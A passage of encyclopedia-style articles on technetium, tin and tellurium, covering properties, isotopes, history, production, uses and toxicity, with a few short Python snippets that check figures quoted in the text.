dehydrogenation of isopropyl alcohol, it is a far more effective catalyst than either rhenium or palladium. However, its radioactivity is a major problem in safe catalytic applications. When steel is immersed in water, adding a small concentration (55 ppm) of potassium pertechnetate(VII) to the water protects the steel from corrosion, even at elevated temperature. For this reason, pertechnetate has been used as an anodic corrosion inhibitor for steel, although technetium's radioactivity poses problems that limit this application to self-contained systems. While chromate, for example, can also inhibit corrosion, it requires a concentration ten times as high. In one experiment, a specimen of carbon steel was kept in an aqueous solution of pertechnetate for 20 years and was still uncorroded. The mechanism by which pertechnetate prevents corrosion is not well understood, but seems to involve the reversible formation of a thin surface layer (passivation). One theory holds that the pertechnetate reacts with the steel surface to form a layer of technetium dioxide which prevents further corrosion; the same effect explains how iron powder can be used to remove pertechnetate from water. The effect disappears rapidly if the concentration of pertechnetate falls below the minimum concentration or if too high a concentration of other ions is added.
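The parenthetical figure in the imaging passage above, that about 94% of a technetium-99m sample decays in 24 hours, follows directly from the 6.01-hour half-life. A one-function check in Python:

HALF_LIFE_H = 6.01  # Tc-99m half-life in hours, from the text

def fraction_decayed(hours: float) -> float:
    """Fraction of an initial Tc-99m sample that has decayed after `hours`."""
    return 1.0 - 0.5 ** (hours / HALF_LIFE_H)

print(f"after 24 h: {fraction_decayed(24):.1%}")  # ~93.7%, i.e. about 94%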
As noted, the radioactive nature of technetium (3 MBq/L at the concentrations required) makes this corrosion protection impractical in almost all situations. Nevertheless, corrosion protection by pertechnetate ions was proposed (but never adopted) for use in boiling water reactors. Precautions Technetium plays no natural biological role and is not normally found in the human body. Technetium is produced in quantity by nuclear fission, and spreads more readily than many radionuclides. It appears to have low chemical toxicity. For example, no significant change in blood composition, body and organ weights, or food consumption could be detected in rats that ingested up to 15 μg of technetium-99 per gram of food for several weeks. In the body, technetium is quickly converted to the stable pertechnetate ion, which is highly water-soluble and quickly excreted. The radiological toxicity of technetium (per unit of mass) is a function of the compound, the type of radiation of the isotope in question, and the isotope's half-life. All isotopes of technetium must be handled carefully. The most common isotope, technetium-99, is a weak beta emitter; such radiation is stopped by the walls of laboratory glassware. The primary hazard when working with technetium is inhalation of dust; such radioactive contamination in the lungs can pose a significant cancer risk. For most work, careful handling in a fume hood is sufficient, and a glove box is not needed.
Physical sciences
Chemical elements_2
null
30042
https://en.wikipedia.org/wiki/Tin
Tin
Tin is a chemical element; it has symbol Sn (from Latin stannum) and atomic number 50. A silvery-colored metal, tin is soft enough to be cut with little force, and a bar of tin can be bent by hand. When bent, the so-called "tin cry" can be heard as a result of twinning in tin crystals. Tin is a post-transition metal in group 14 of the periodic table of elements. It is obtained chiefly from the mineral cassiterite, which contains stannic oxide, SnO2. Tin shows a chemical similarity to both of its neighbors in group 14, germanium and lead, and has two main oxidation states, +2 and the slightly more stable +4. Tin is the 49th most abundant element on Earth, making up 0.00022% of its crust, and with 10 stable isotopes, it has the largest number of stable isotopes in the periodic table, due to its magic number of protons. It has two main allotropes: at room temperature, the stable allotrope is β-tin, a silvery-white, malleable metal; at low temperatures the stable form is the less dense grey α-tin, which has the diamond cubic structure. Metallic tin does not easily oxidize in air and water. The first tin alloy used on a large scale was bronze, made of 12.5% tin and 87.5% copper, from as early as 3000 BC. After 600 BC, pure metallic tin was produced. Pewter, which is an alloy of 85–90% tin with the remainder commonly consisting of copper, antimony, bismuth, and sometimes lead and silver, has been used for flatware since the Bronze Age. In modern times, tin is used in many alloys, most notably tin-lead soft solders, which are typically 60% or more tin, and in the manufacture of transparent, electrically conducting films of indium tin oxide in optoelectronic applications. Another large application is corrosion-resistant tin plating of steel. Because of the low toxicity of inorganic tin, tin-plated steel is widely used for food packaging as "tin cans". Some organotin compounds can be extremely toxic. Characteristics Physical Tin is a soft, malleable, ductile and highly crystalline silvery-white metal. When a bar of tin is bent, a crackling sound known as the "tin cry" can be heard from the twinning of the crystals. This trait is shared by indium, cadmium, zinc, and mercury in its solid state. Tin melts at about 232 °C, the lowest in group 14, and boils at about 2602 °C, the second lowest (ahead of lead) in its group. The melting point is further lowered for particles of 11 nm size. β-tin, also called white tin, is the allotrope (structural form) of elemental tin that is stable at and above room temperature. It is metallic and malleable, and has a body-centered tetragonal crystal structure. α-tin, or gray tin, is the nonmetallic form. It is stable below 13.2 °C and is brittle. α-tin has a diamond cubic crystal structure, as do diamond and silicon. α-tin does not have metallic properties because its atoms form a covalent structure in which electrons cannot move freely. α-tin is a dull-gray powdery material with no common uses other than specialized semiconductor applications. γ-tin and σ-tin exist at elevated temperatures and at pressures above several GPa. In cold conditions β-tin tends to transform spontaneously into α-tin, a phenomenon known as "tin pest" or "tin disease". Some unverifiable sources also say that, during Napoleon's Russian campaign of 1812, the temperatures became so cold that the tin buttons on the soldiers' uniforms disintegrated over time, contributing to the defeat of the Grande Armée; this remains a persistent legend. The α-β transformation temperature is 13.2 °C, but impurities (e.g. Al, Zn, etc.) lower it well below 0 °C.
With the addition of antimony or bismuth the transformation might not occur at all, increasing durability. Commercial grades of tin (99.8% tin content) resist transformation because of the inhibiting effect of small amounts of bismuth, antimony, lead, and silver present as impurities. Alloying elements such as copper, antimony, bismuth, cadmium, and silver increase the hardness of tin. Tin easily forms hard, brittle intermetallic phases that are typically undesirable. It does not form solid solutions with most metals and elements, so tin has little solid solubility. Tin mixes well with bismuth, gallium, lead, thallium and zinc, forming simple eutectic systems. Tin becomes a superconductor below 3.72 K and was one of the first superconductors to be studied. The Meissner effect, one of the characteristic features of superconductors, was first discovered in superconducting tin crystals. Chemical Tin resists corrosion from water, but can be corroded by acids and alkalis. Tin can be highly polished and is used as a protective coat for other metals. When heated in air it oxidizes slowly to form a thin passivation layer of stannic oxide (SnO2) that inhibits further oxidation. Isotopes Tin has ten stable isotopes, the greatest number of any element. Their mass numbers are 112, 114, 115, 116, 117, 118, 119, 120, 122, and 124. Tin-120 makes up almost a third of all tin. Tin-118 and tin-116 are also common. Tin-115 is the least common stable isotope. The isotopes with even mass numbers have no nuclear spin, while those with odd mass numbers have a nuclear spin of 1/2. It is thought that tin has such a great multitude of stable isotopes because its atomic number of 50 is a "magic number" in nuclear physics. Tin is one of the easiest elements to detect and analyze by NMR spectroscopy; its chemical shifts are referenced against tetramethyltin (SnMe4). Of the stable isotopes, tin-115 has a high neutron capture cross section for fast neutrons, at 30 barns. Tin-117 has a cross section of 2.3 barns, one order of magnitude smaller, while tin-119 has a slightly smaller cross section of 2.2 barns. Before these cross sections were well known, it was proposed to use tin-lead solder as a coolant for fast reactors because of its low melting point. Current studies focus on lead or lead-bismuth reactor coolants, because both heavy metals are nearly transparent to fast neutrons, with very low capture cross sections. In order to use a tin or tin-lead coolant, the tin would first have to go through isotopic separation to remove the isotopes with odd mass number. Combined, these three odd-mass isotopes make up about 17% of natural tin but represent nearly all of the capture cross section (a check of this arithmetic follows below). Of the remaining seven isotopes, tin-112 has a capture cross section of 1 barn. The other six isotopes, forming 82.7% of natural tin, have capture cross sections of 0.3 barns or less, making them effectively transparent to neutrons. Tin has 31 unstable isotopes, ranging in mass number from 99 to 139. The unstable tin isotopes have half-lives of less than a year except for tin-126, which has a half-life of about 230,000 years. Tin-100 and tin-132 are two of the very few unstable nuclides with a "doubly magic" nucleus; despite their very uneven neutron–proton ratios, they mark the endpoints beyond which tin isotopes lighter than tin-100 or heavier than tin-132 are much less stable.
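As flagged above, the claim about the three odd-mass isotopes can be checked with an abundance-weighted sum. A sketch in Python; the natural-abundance figures are standard isotopic-composition values assumed for the sketch, while the cross sections come from the text, with "0.3 barns or less" taken as an upper bound of 0.3:

# (abundance in % of natural tin, fast-neutron capture cross section in barns)
isotopes = {
    112: (0.97, 1.0),
    114: (0.66, 0.3), 115: (0.34, 30.0), 116: (14.54, 0.3),
    117: (7.68, 2.3), 118: (24.22, 0.3), 119: (8.59, 2.2),
    120: (32.58, 0.3), 122: (4.63, 0.3), 124: (5.79, 0.3),
}

odd_trio = (115, 117, 119)
trio_abundance = sum(isotopes[a][0] for a in odd_trio)
trio_sigma = sum(isotopes[a][0] / 100 * isotopes[a][1] for a in odd_trio)
total_sigma = sum(ab / 100 * sig for ab, sig in isotopes.values())

print(f"Sn-115/117/119 abundance: {trio_abundance:.1f}%")   # ~16.6%
print(f"their weighted cross section: {trio_sigma:.2f} b")  # ~0.47 b
print(f"upper bound for all ten:      {total_sigma:.2f} b") # ~0.72 b

The trio's abundance comes out near 17%, and its weighted cross section dominates the combined total; its true share is higher still wherever the even-mass cross sections fall below the 0.3-barn bound.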
Another 30 metastable isomers have been identified for tin isotopes between 111 and 131, the most stable being tin-121m, with a half-life of 43.9 years. The relative differences in the abundances of tin's stable isotopes can be explained by how they are formed during stellar nucleosynthesis. Tin-116 through tin-120, along with tin-122, are formed in the s-process (slow neutron capture) in most stars, which leads to them being the most common tin isotopes, while tin-124 is only formed in the r-process (rapid neutron capture) in supernovae and neutron star mergers. Tin isotopes 115, 117 through 120, and 122 are produced via both the s-process and the r-process. The two lightest stable isotopes, tin-112 and tin-114, cannot be made in significant amounts in the s- or r-processes and are among the p-nuclei whose origins are not well understood. Some theories about their formation include proton capture and photodisintegration. Tin-115 might be partially produced in the s-process, both directly and as the daughter of long-lived indium-115, and also from the decay of indium-115 produced via the r-process. Etymology The word tin is shared among Germanic languages and can be traced back to reconstructed Proto-Germanic *tin-om; cognates include German Zinn, Swedish tenn and Dutch tin. It is not found in other branches of Indo-European, except by borrowing from Germanic (e.g., Irish, where the word was borrowed from English). The Latin name for tin, stannum, originally meant an alloy of silver and lead, and came to mean 'tin' in the fourth century; the earlier Latin word for it was plumbum candidum, or "white lead". Stannum apparently came from an earlier stagnum (meaning the same substance), the origin of the Romance and Celtic terms for tin, such as French étain, Spanish estaño, Italian stagno, and Irish stán. The origin of stannum/stagnum is unknown; it may be pre-Indo-European. One source suggests instead that stannum came from Cornish stean, and is evidence that Cornwall in the first centuries AD was the main source of tin. History Tin extraction and use can be dated to the beginnings of the Bronze Age around 3000 BC, when it was observed that copper objects formed of polymetallic ores with different metal contents had different physical properties. The earliest bronze objects had a tin or arsenic content of less than 2% and are believed to be the result of unintentional alloying due to trace metal content in the copper ore. The addition of a second metal to copper increases its hardness, lowers the melting temperature, and improves the casting process by producing a more fluid melt that cools to a denser, less spongy metal. This was an important innovation that allowed for the much more complex shapes cast in closed molds of the Bronze Age. Arsenical bronze objects appear first in the Near East where arsenic is commonly found with copper ore, but the health risks were quickly realized and the quest for sources of the much less hazardous tin ores began early in the Bronze Age. This created the demand for rare tin metal and formed a trade network that linked the distant sources of tin to the markets of Bronze Age cultures. Cassiterite (SnO2), the oxide form of tin, was most likely the original source of tin. Other tin ores are less common sulfides such as stannite that require a more involved smelting process. Cassiterite often accumulates in alluvial channels as placer deposits because it is harder, heavier, and more chemically resistant than the accompanying granite. Cassiterite is usually black or dark in color, and these deposits can be easily seen in river banks.
Alluvial (placer) deposits may incidentally have been collected and separated by methods similar to gold panning. Compounds and chemistry In the great majority of its compounds, tin has the oxidation state II or IV. Compounds containing bivalent tin are called stannous, while those containing tetravalent tin are termed stannic. Inorganic compounds Halide compounds are known for both oxidation states. For Sn(IV), all four halides are well known: SnF4, SnCl4, SnBr4, and SnI4. The three heavier members are volatile molecular compounds, whereas the tetrafluoride is polymeric. All four halides are known for Sn(II) also: SnF2, SnCl2, SnBr2, and SnI2. All are polymeric solids. Of these eight compounds, only the iodides are colored. Tin(II) chloride (also known as stannous chloride) is the most important commercial tin halide. Illustrating the routes to such compounds, chlorine reacts with tin metal to give SnCl4, whereas the reaction of hydrochloric acid and tin produces SnCl2 and hydrogen gas. Alternatively, SnCl4 and Sn combine to stannous chloride by a process called comproportionation: SnCl4 + Sn → 2 SnCl2 Tin can form many oxides, sulfides, and other chalcogenide derivatives. The dioxide SnO2 (cassiterite) forms when tin is heated in the presence of air. SnO2 is amphoteric, which means that it dissolves in both acidic and basic solutions. Stannates with the structure [Sn(OH)6]2−, like K2[Sn(OH)6], are also known, though the free stannic acid H2[Sn(OH)6] is unknown. Sulfides of tin exist in both the +2 and +4 oxidation states: tin(II) sulfide and tin(IV) sulfide (mosaic gold). Hydrides Stannane (SnH4), with tin in the +4 oxidation state, is unstable. Organotin hydrides are however well known, e.g. tributyltin hydride (Sn(C4H9)3H). These compounds release transient tributyltin radicals, which are rare examples of compounds of tin(III). Organotin compounds Organotin compounds, sometimes called stannanes, are chemical compounds with tin–carbon bonds. Of the tin compounds, the organic derivatives are commercially the most useful. Some organotin compounds are highly toxic and have been used as biocides. The first organotin compound to be reported was diethyltin diiodide ((C2H5)2SnI2), reported by Edward Frankland in 1849. Most organotin compounds are colorless liquids or solids that are stable to air and water. They adopt tetrahedral geometry. Tetraalkyl- and tetraaryltin compounds can be prepared using Grignard reagents: SnCl4 + 4 RMgBr → R4Sn + 4 MgBrCl The mixed halide-alkyls, which are more common and more important commercially than the tetraorgano derivatives, are prepared by redistribution reactions: SnCl4 + R4Sn → 2 R2SnCl2 Divalent organotin compounds are uncommon, although more common than related divalent organogermanium and organosilicon compounds. The greater stabilization enjoyed by Sn(II) is attributed to the "inert pair effect". Organotin(II) compounds include both stannylenes (formula: R2Sn, analogous to singlet carbenes) and distannylenes (R4Sn2), which are roughly analogous to alkenes. Both classes exhibit unusual reactions. Occurrence Tin is generated via the long s-process in low-to-medium mass stars (with masses of 0.6 to 10 times that of the Sun), and finally by beta decay of the heavy isotopes of indium. Tin is the 49th most abundant element in Earth's crust, representing 2 ppm compared with 75 ppm for zinc, 50 ppm for copper, and 14 ppm for lead. Tin does not occur as the native element but must be extracted from various ores.
Cassiterite (SnO2) is the only commercially important source of tin, although small quantities of tin are recovered from complex sulfides such as stannite, cylindrite, franckeite, canfieldite, and teallite. Minerals with tin are almost always associated with granite rock, usually at a level of 1% tin oxide content. Because of the higher specific gravity of tin dioxide, about 80% of mined tin is from secondary deposits found downstream from the primary lodes. Tin is often recovered from granules washed downstream in the past and deposited in valleys or the sea. The most economical ways of mining tin are by dredging, hydraulicking, or open pits. Most of the world's tin is produced from placer deposits, which can contain as little as 0.015% tin. About 253,000 tonnes of tin were mined in 2011, mostly in China (110,000 t), Indonesia (51,000 t), Peru (34,600 t), Bolivia (20,700 t) and Brazil (12,000 t). Estimates of tin production have historically varied with the market and mining technology. It is estimated that, at current consumption rates and technologies, the Earth will run out of mineable tin in 40 years. In 2006 Lester Brown suggested tin could run out within 20 years based on conservative estimates of 2% annual growth. Scrap tin is an important source of the metal. Recovery of tin through recycling is increasing rapidly as of 2019. Whereas the United States has neither mined (since 1993) nor smelted (since 1989) tin, it was the largest secondary producer, recycling nearly 14,000 tonnes in 2006. New deposits are reported in Mongolia, and in 2009, new deposits of tin were discovered in Colombia. Production Tin is produced by carbothermic reduction of the oxide ore with carbon or coke; the stoichiometry of this reduction is sketched below. Both reverberatory furnaces and electric furnaces can be used: SnO2 + C → Sn + CO2↑ Mining and smelting Industry The ten largest tin-producing companies produced most of the world's tin in 2007. Most of the world's tin is traded on the LME, from 8 countries, under 17 brands. The International Tin Council was established in 1947 to control the price of tin. It collapsed in 1985. In 1984, the Association of Tin Producing Countries was created, with Australia, Bolivia, Indonesia, Malaysia, Nigeria, Thailand, and Zaire as members. Price and exchanges Tin is unique among mineral commodities because of the complex agreements between producer countries and consumer countries dating back to 1921. Earlier agreements tended to be somewhat informal and led to the "First International Tin Agreement" in 1956, the first of a series that effectively collapsed in 1985. Through these agreements, the International Tin Council (ITC) had a considerable effect on tin prices. The ITC supported the price of tin during periods of low prices by buying tin for its buffer stockpile and was able to restrain the price during periods of high prices by selling from the stockpile. This was an anti-free-market approach, designed to assure a sufficient flow of tin to consumer countries and a profit for producer countries. However, the buffer stockpile was not sufficiently large, and during most of those 29 years tin prices rose, sometimes sharply, especially from 1973 through 1980 when rampant inflation plagued many world economies. During the late 1970s and early 1980s, the U.S. reduced its strategic tin stockpile, partly to take advantage of historically high tin prices. The 1981–82 recession damaged the tin industry. Tin consumption declined dramatically.
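As promised above for the carbothermic reduction: ideal stoichiometry fixes the minimum ore and carbon charge per tonne of tin. A rough sketch in Python, assuming a pure SnO2 feed and complete reduction to CO2 (an idealization; real smelters use excess coke and also form CO):

# SnO2 + C -> Sn + CO2 (idealized)
M_SN, M_C, M_SNO2 = 118.71, 12.011, 150.71  # molar masses, g/mol

def charge_per_tonne_tin() -> tuple[float, float]:
    """Tonnes of SnO2 and of carbon needed per tonne of tin
    at ideal 1:1 stoichiometry."""
    moles_sn = 1e6 / M_SN               # mol of Sn in one tonne
    ore_t = moles_sn * M_SNO2 / 1e6
    carbon_t = moles_sn * M_C / 1e6
    return ore_t, carbon_t

ore, carbon = charge_per_tonne_tin()
print(f"per tonne Sn: {ore:.2f} t SnO2, {carbon:.3f} t C minimum")
# ~1.27 t of SnO2 and at least ~0.10 t of carbon per tonne of tin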
The ITC was able to avoid truly steep declines through accelerated buying for its buffer stockpile; this activity required extensive borrowing. The ITC continued to borrow until late 1985, when it reached its credit limit. Immediately, a major "tin crisis" ensued: tin was delisted from trading on the London Metal Exchange for about three years. The ITC dissolved soon afterward, and the price of tin, now in a free-market environment, fell to $4 per pound and remained around that level through the 1990s. The price increased again by 2010 with a rebound in demand following the 2007–2008 economic crisis, accompanied by restocking and continued growth in consumption. The London Metal Exchange (LME) is tin's principal trading site. Other tin contract markets are the Kuala Lumpur Tin Market (KLTM) and the Indonesia Tin Exchange (INATIN). Due to factors involved in the 2021 global supply chain crisis, tin prices almost doubled during 2020–21 and saw their largest annual rise in over 30 years. Global refined tin consumption dropped 1.6 percent in 2020 as the COVID-19 pandemic disrupted global manufacturing industries. Applications In 2018, just under half of all tin produced was used in solder. The rest was divided between tin plating, tin chemicals, brass and bronze alloys, and niche uses. Pigments Pigment Yellow 38, tin(IV) sulfide, is known as mosaic gold. Purple of Cassius (Pigment Red 109), a hydrous double stannate of gold, was largely restricted in painting to miniatures because of its high cost. It was widely used to make cranberry glass. It has also been used in the arts to stain porcelain. Lead-tin yellow, which occurs in two yellow forms (a stannate and a silicate), was a pigment that was historically highly important for oil painting and which had some use in fresco in its silicate form. Lead stannate is also known in orange form but has not seen wide use in the fine arts. It is available for purchase in pigment form from specialist artists' suppliers. There is another form of lead-tin yellow, minor in terms of artistic usage and availability, known as lead-tin antimony yellow. Cerulean blue, a somewhat dull cyan chemically known as cobalt stannate, continues to be an important artists' pigment. Its hue is similar to that of manganese blue, Pigment Blue 33, although it lacks that pigment's colorfulness and is more opaque. Artists typically must choose between cobalt stannate and manganese blue imitations made with phthalocyanine blue green shade (Pigment Blue 15:3), as industrial production of manganese blue pigment ceased in the 1970s. Cerulean blue made with cobalt stannate, however, was popular with artists prior to the production of manganese blue. Pigment Red 233, commonly known as Pinkcolor or Potter's Pink and more precisely known as Chrome Tin Pink Sphene, is a historically important pigment in watercolor, and it has enjoyed a large resurgence in popularity due to Internet-based word of mouth. It is fully lightfast and chemically stable in both oil paints and watercolors. Other inorganic mixed metal complex pigments, produced via calcination, often feature tin as a constituent. These pigments are known for their lightfastness, weatherfastness, chemical stability, lack of toxicity, and opacity. Many are rather dull in terms of colorfulness, though some possess enough colorfulness to be competitive for uses that demand it, and some are prized for other qualities.
For instance, Pinkcolor is chosen by many watercolorists for its strong granulation, even though its chroma is low. Recently, NTP Yellow (a pyrochlore) has been brought to market as a non-toxic replacement for lead(II) chromate, with greater opacity, lightfastness, and weathering resistance than the organic pigments proposed as lead chromate replacements. NTP Yellow possesses the highest level of color saturation of these contemporary inorganic mixed metal complex pigments. More examples of this group include Pigment Yellow 158 (Tin Vanadium Yellow Cassiterite), Pigment Yellow 216 (Solaplex Yellow), Pigment Yellow 219 (Titanium Zinc Antimony Stannate), Pigment Orange 82 (Tin Titanium Zinc oxide, also known as Sicopal Orange), Pigment Red 121 (also known as Tin Violet and Chromium stannate), Pigment Red 230 (Chrome Alumina Pink Corundum), Pigment Red 236 (Chrome Tin Orchid Cassiterite), and Pigment Black 23 (Tin Antimony Grey Cassiterite). Another blue pigment with tin and cobalt is Pigment Blue 81, Cobalt Tin Alumina Blue Spinel. Pigment White 15, tin(IV) oxide, is used for its iridescence, most commonly as a ceramic glaze. According to the Colour Index International, no green pigments used by artists contain tin, and purplish pigments with tin are classified as red. Solder Tin has long been used in alloys with lead as solder, in amounts of 5 to 70% w/w. Tin and lead form a eutectic mixture at the weight proportion of 61.9% tin and 38.1% lead (in atomic proportion: 73.9% tin and 26.1% lead, a conversion checked in the sketch below), with a melting temperature of 183 °C (361.4 °F). Such solders are primarily used for joining pipes or electric circuits. Since the European Union Waste Electrical and Electronic Equipment Directive (WEEE Directive) and Restriction of Hazardous Substances Directive came into effect on 1 July 2006, the lead content in such alloys has decreased. While lead exposure is associated with serious health problems, lead-free solder is not without its challenges, including a higher melting point and the formation of tin whiskers that cause electrical problems. Tin pest can occur in lead-free solders, leading to loss of the soldered joint. Replacement alloys are being found, but the problems of joint integrity remain. A common lead-free alloy is 99% tin, 0.7% copper, and 0.3% silver, with a melting temperature of 217 °C (422.6 °F). Tin plating Tin bonds readily to iron and is used for coating lead, zinc, and steel to prevent corrosion. Tin-plated (or tinned) steel containers are widely used for food preservation, and this forms a large part of the market for metallic tin. A tinplate canister for preserving food was first manufactured in London in 1812. Speakers of British English call such containers "tins", while speakers of U.S. English call them "cans" or "tin cans". One derivation of such use is the slang term "tinnie" or "tinny", meaning "can of beer" in Australia. The tin whistle is so called because it was first mass-produced in tin-plated steel. Copper cooking vessels such as saucepans and frying pans are frequently lined with a thin plating of tin, by electroplating or by traditional chemical methods, since use of copper cookware with acidic foods can be toxic. Specialized alloys Tin in combination with other elements forms a wide variety of useful alloys. Tin is most commonly alloyed with copper. Pewter is 85–99% tin, and bearing metal has a high percentage of tin as well.
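The weight-to-atomic conversion for the eutectic composition quoted in the solder passage above is simple mole arithmetic. A check in Python; the molar masses are standard values assumed for the sketch:

M_SN, M_PB = 118.71, 207.2  # molar masses of tin and lead, g/mol

def atomic_percent_sn(wt_pct_sn: float) -> float:
    """Convert a tin weight percentage in a Sn-Pb alloy to atomic percent."""
    mol_sn = wt_pct_sn / M_SN
    mol_pb = (100.0 - wt_pct_sn) / M_PB
    return 100.0 * mol_sn / (mol_sn + mol_pb)

print(f"{atomic_percent_sn(61.9):.1f} at.% Sn")  # ~73.9, matching the text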
Bronze is mostly copper with 12% tin, while the addition of phosphorus yields phosphor bronze. Bell metal is also a copper–tin alloy, containing 22% tin. Tin has sometimes been used in coinage; it once formed a single-digit percentage (usually five percent or less) of American and Canadian pennies. The niobium–tin compound Nb3Sn is commercially used in coils of superconducting magnets for its high critical temperature (18 K) and critical magnetic field (25 T). A superconducting magnet weighing as little as two kilograms is capable of producing the magnetic field of a conventional electromagnet weighing tons. A small percentage of tin is added to zirconium alloys for the cladding of nuclear fuel. Most metal pipes in a pipe organ are of a tin/lead alloy, with 50/50 as the most common composition. The proportion of tin in the pipe defines the pipe's tone, since tin has a desirable tonal resonance. When a tin/lead alloy cools, the lead phase solidifies first; then, when the eutectic temperature is reached, the remaining liquid forms the layered tin/lead eutectic structure, which is shiny, and contrast with the lead phase produces a mottled or spotted effect. This metal alloy is referred to as spotted metal. Major advantages of using tin for pipes include its appearance, workability, and resistance to corrosion. Manufacturing of chemicals Tin compounds are used in the production of various chemicals, including stabilizers for PVC and catalysts for industrial processes. Tin in the form of ingots provides the raw material for these chemical processes. Optoelectronics The oxides of indium and tin are electrically conductive and transparent, and are used to make transparent electrically conducting films with applications in optoelectronic devices such as liquid crystal displays. Other applications Punched tin-plated steel, also called pierced tin, is an artisan technique originating in central Europe for creating functional and decorative housewares. Decorative piercing designs exist in a wide variety, based on local tradition and the artisan. Punched tin lanterns are the most common application of this artisan technique. The light of a candle shining through the pierced design creates a decorative light pattern in the room where it sits. Lanterns and other punched tin articles were created in the New World from the earliest European settlement. A well-known example is the Revere lantern, named after Paul Revere. In America, pie safes and food safes were in use in the days before refrigeration. These were wooden cupboards of various styles and sizes – either floor standing or hanging cupboards meant to discourage vermin and insects and to keep dust from perishable foodstuffs. These cabinets had tinplate inserts in the doors and sometimes in the sides, punched out by the homeowner, cabinetmaker, or a tinsmith in varying designs to allow for air circulation while excluding flies. Modern reproductions of these articles remain popular in North America. Window glass is most often made by floating molten glass on molten tin (float glass), resulting in a flat and flawless surface. This is also called the "Pilkington process". Tin is used as a negative electrode in advanced Li-ion batteries. Its application is somewhat limited by the fact that some tin surfaces catalyze decomposition of carbonate-based electrolytes used in Li-ion batteries. Tin(II) fluoride is added to some dental care products as stannous fluoride (SnF2).
Tin(II) fluoride can be mixed with calcium abrasives, while the more common sodium fluoride gradually becomes biologically inactive in the presence of calcium compounds. It has also been shown to be more effective than sodium fluoride in controlling gingivitis. Tin is used as a target to create laser-induced plasmas that act as the light source for extreme ultraviolet lithography. Organotin compounds Organotin compounds are organometallic compounds containing tin–carbon bonds. Worldwide industrial production of organotin compounds likely exceeds 50,000 tonnes. PVC stabilizers The major commercial application of organotin compounds is in the stabilization of PVC plastics. In the absence of such stabilizers, PVC would rapidly degrade under heat, light, and atmospheric oxygen, resulting in discolored, brittle products. Tin scavenges labile chloride ions (Cl−), which would otherwise strip HCl from the plastic material. Typical tin compounds are carboxylic acid derivatives of dibutyltin dichloride, such as dibutyltin dilaurate. Biocides Some organotin compounds are relatively toxic, with both advantages and problems. They are used for their biocidal properties as fungicides, pesticides, algaecides, wood preservatives, and antifouling agents. Tributyltin oxide is used as a wood preservative. Tributyltin is used for various industrial purposes such as slime control in paper mills and disinfection of circulating industrial cooling waters. Tributyltin was used as an additive in ship paint to prevent the growth of fouling organisms on ships, with use declining after organotin compounds were recognized as persistent organic pollutants with high toxicity for some marine organisms (the dog whelk, for example). The EU banned the use of organotin compounds in 2003, while concerns over the toxicity of these compounds to marine life and damage to the reproduction and growth of some marine species (some reports describe biological effects to marine life at a concentration of 1 nanogram per liter) have led to a worldwide ban by the International Maritime Organization. Many nations now restrict the use of organotin compounds to vessels greater than 25 m long. The persistence of tributyltin in the aquatic environment is dependent upon the nature of the ecosystem. Because of this persistence and its use as an additive in ship paint, high concentrations of tributyltin have been found in marine sediments located near naval docks. Imposex in neogastropods, documented in at least 82 species, has been used as a biomarker of tributyltin pollution. High levels of TBT in local inshore areas, caused by shipping activity, have had adverse effects on shellfish. Imposex is the imposition of male sexual characteristics on female specimens, in which they grow a penis and a pallial vas deferens. A high level of TBT can damage mammalian endocrine glands, the reproductive and central nervous systems, bone structure, and the gastrointestinal tract. Tributyltin also affects mammals, including sea otters, whales, dolphins, and humans. Organic chemistry Some tin reagents are useful in organic chemistry. In the largest application, stannous chloride is a common reducing agent for the conversion of nitro and oxime groups to amines. The Stille reaction couples organotin compounds with organic halides or pseudohalides. Li-ion batteries Tin forms several intermetallic phases with lithium metal, making it a potentially attractive material for battery applications.
Large volumetric expansion of tin upon alloying with lithium and instability of the tin–organic electrolyte interface at low electrochemical potentials are the greatest challenges to its employment in commercial cells. A tin intermetallic compound with cobalt and carbon was implemented by Sony in its Nexelion cells released in the late 2000s. The composition of the active material is approximately Sn0.3Co0.4C0.3. Research showed that only some crystalline facets of tetragonal (beta) Sn are responsible for the undesirable electrochemical activity. Precautions Cases of poisoning from tin metal, its oxides, and its salts are almost unknown. On the other hand, certain organotin compounds are almost as toxic as cyanide. Exposure to tin in the workplace can occur by inhalation, skin contact, and eye contact. The US Occupational Safety and Health Administration (OSHA) has set the permissible exposure limit for tin in the workplace at 2 mg/m3 over an 8-hour workday. The National Institute for Occupational Safety and Health (NIOSH) has set a recommended exposure limit (REL) of 2 mg/m3 over an 8-hour workday. At levels of 100 mg/m3, tin is immediately dangerous to life and health.
Physical sciences
Chemical elements_2
null
30043
https://en.wikipedia.org/wiki/Tellurium
Tellurium
Tellurium is a chemical element; it has symbol Te and atomic number 52. It is a brittle, mildly toxic, rare, silver-white metalloid. Tellurium is chemically related to selenium and sulfur, all three of which are chalcogens. It is occasionally found in its native form as elemental crystals. Tellurium is far more common in the Universe as a whole than on Earth. Its extreme rarity in the Earth's crust, comparable to that of platinum, is due partly to its formation of a volatile hydride that caused tellurium to be lost to space as a gas during the hot nebular formation of Earth. Tellurium-bearing compounds were first discovered in 1782 in a gold mine in Kleinschlatten, Transylvania (now Zlatna, Romania) by Austrian mineralogist Franz-Joseph Müller von Reichenstein, although it was Martin Heinrich Klaproth who named the new element in 1798 after tellus, the Latin word for 'earth'. Gold telluride minerals are the most notable natural gold compounds. However, they are not a commercially significant source of tellurium itself, which is normally extracted as a by-product of copper and lead production. Commercially, the primary uses of tellurium are in CdTe solar panels and thermoelectric devices. A more traditional application in copper (tellurium copper) and steel alloys, where tellurium improves machinability, also consumes a considerable portion of tellurium production. Tellurium is considered a technology-critical element. Tellurium has no biological function, although fungi can use it in place of sulfur and selenium in amino acids such as tellurocysteine and telluromethionine. In humans, tellurium is partly metabolized into dimethyl telluride, (CH3)2Te, a gas with a garlic-like odor exhaled in the breath of victims of tellurium exposure or poisoning. Characteristics Physical properties Tellurium has two allotropes, crystalline and amorphous. When crystalline, tellurium is silvery-white with a metallic luster. The crystals are trigonal and chiral (space group 152 or 154 depending on the chirality), like the gray form of selenium. It is a brittle and easily pulverized metalloid. Amorphous tellurium is a black-brown powder prepared by precipitating it from a solution of tellurous acid or telluric acid (Te(OH)6). Tellurium is a semiconductor that shows greater electrical conductivity in certain directions depending on atomic alignment; the conductivity increases slightly when exposed to light (photoconductivity). When molten, tellurium is corrosive to copper, iron, and stainless steel. Of the chalcogens (oxygen-family elements), tellurium has the highest melting and boiling points. Chemical properties Crystalline tellurium consists of parallel helical chains of Te atoms, with three atoms per turn. This gray material resists oxidation by air and is not volatile. Isotopes Naturally occurring tellurium has eight isotopes. Six of those isotopes, 120Te, 122Te, 123Te, 124Te, 125Te, and 126Te, are stable. The other two, 128Te and 130Te, are slightly 